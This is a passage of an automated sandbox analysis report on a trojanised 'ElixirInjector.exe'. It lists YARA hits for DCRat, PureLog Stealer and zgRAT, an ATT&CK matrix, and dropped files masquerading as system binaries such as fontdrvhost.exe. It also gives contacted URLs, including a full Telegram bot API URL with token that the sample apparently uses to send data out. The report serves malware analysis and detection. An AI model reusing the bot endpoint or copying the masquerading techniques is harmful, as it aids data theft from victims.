Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	Queries volume information: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	Queries volume information: C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe VolumeInformation

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F2DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_00F2DF1E

Source: C:\Users\user\Desktop\ElixirInjector.exe

Code function: 0_2_00F1B146 GetVersionExW,

0_2_00F1B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2669535434.0000000012933000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bluestacks.exe PID: 3576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fvXBwqYdGYPkplbuTcoXecCdP.exe PID: 8996, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.0.Bluestacks.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.2216100697.0000000000162000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match

File source: 5.0.Bluestacks.exe.160000.0.unpack, type: UNPACKEDPE

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.2669535434.0000000012933000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bluestacks.exe PID: 3576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fvXBwqYdGYPkplbuTcoXecCdP.exe PID: 8996, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 5.0.Bluestacks.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.2216100697.0000000000162000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY

Yara detected zgRAT

Source: Yara match

File source: 5.0.Bluestacks.exe.160000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Obfuscated Files or Information	Security Account Manager	37 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	Login Hook	Login Hook	1 Software Packing	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	133 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	11 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ElixirInjector.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
ElixirInjector.exe	65%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	100%	Avira	HEUR/AGEN.1339906
C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\QUJ9Bg46i5eTnOQKEnteAp7rp1YY9NQfmUbhx6iPrrb4U6kE.vbe	100%	Avira	VBS/Runner.VPG
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	100%	Avira	HEUR/AGEN.1339906
C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\fontdrvhost.exe	59%	Virustotal		Browse
C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	59%	Virustotal		Browse
C:\Program Files\7-Zip\fvXBwqYdGYPkplbuTcoXecCdP.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\AppData\Local\Temp\WinRAR\data\bin\unistall\Bluestacks.exe	59%	Virustotal		Browse
C:\Users\user\Desktop\BlUGSVrR.log	4%	ReversingLabs
C:\Users\user\Desktop\BlUGSVrR.log	1%	Virustotal		Browse
C:\Users\user\Desktop\DvqGSnXS.log	38%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\EbKwZRsK.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\TxvLlrMg.log	6%	ReversingLabs
C:\Users\user\Desktop\VHSMlJrg.log	9%	ReversingLabs
C:\Users\user\Desktop\mPirFwXv.log	17%	ReversingLabs
C:\Users\user\Desktop\rCAqismj.log	8%	ReversingLabs
C:\Users\user\Desktop\uAazTYNi.log	25%	ReversingLabs
C:\Users\user\Desktop\wxCHpYcd.log	50%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\BitLockerDiscoveryVolumeContents\fvXBwqYdGYPkplbuTcoXecCdP.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\Microsoft.NET\fvXBwqYdGYPkplbuTcoXecCdP.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Windows\ShellComponents\cmd.exe (copy)	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipinfo.io	34.117.59.81	true	false		high
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Reputation
https://ipinfo.io/country	false	high
https://api.telegram.org/bot7622199935:AAFHSUQ61526mhYJcmipjqz2DM9Zso04aBI/sendPhoto	false	high
https://ipinfo.io/ip	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org	Bluestacks.exe, 00000005.00000002.2525083932.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000003E.00000002.2709061242.000001AD35FB7000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Bluestacks.exe, 00000005.00000002.2518199953.0000000000BC2000.00000002.00000001.01000000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.0000000002EC5000.00000004.00000800.00020000.00000000.sdmp, Bluestacks.exe, 00000005.00000002.2525083932.000000000297E000.00000004.00000800.00020000.00000000.sdmp, BlUGSVrR.log.5.dr	false	high
